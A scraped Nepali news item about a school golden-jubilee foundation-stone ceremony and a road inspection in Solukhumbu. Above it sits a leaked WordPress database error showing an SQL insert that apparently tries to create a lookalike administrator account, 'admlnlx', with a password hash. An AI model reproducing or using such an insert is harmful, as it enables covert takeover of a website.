WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BY6THgHMfYJFQquLYGgUk3S9szSVp21', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-24 04:29:53', '', 'admlnlx', 'admlnlx')
सोलुखुम्बु, १७ मंसिर । माप्य दुधकोशी गाउँपालिकाका २ स्थित श्री बासा खाली माविको स्वर्णप्रतीकको सिलन्यास आज एक कार्यक्रम बीच गाउँपालिका अध्यक्ष बुद्धिकिरण राईले गर्नुभएको छ ।
स्वर्ण महोत्सव कार्यक्रमका सह संयोजक अर्जुन राईको अध्यक्षतामा सन्चालन भएको कार्यक्रमलाई सम्बोधन गर्नु हुँदै अध्यक्ष राईले बाल उद्यान कार्यक्रमको लागि गाउँपालिकाबाट पाँच लाख रुपैयाँ बजेट बिनियोजन गर्ने प्रतिबद्धता समेत व्यक्त गर्नुभएको छ ।
यसै क्रममा गाउँपालिका अध्यक्ष लगायतको टोलिले खुम्बु जोड्ने सडकको अनुगमन समेत गर्नुभएको छ । कार्यक्रममा अभिभावक, विद्यार्थी, स्ठानीय कर्मचारी, स्ठानीय को बाक्लो सहभगिता रहेको थियो ।





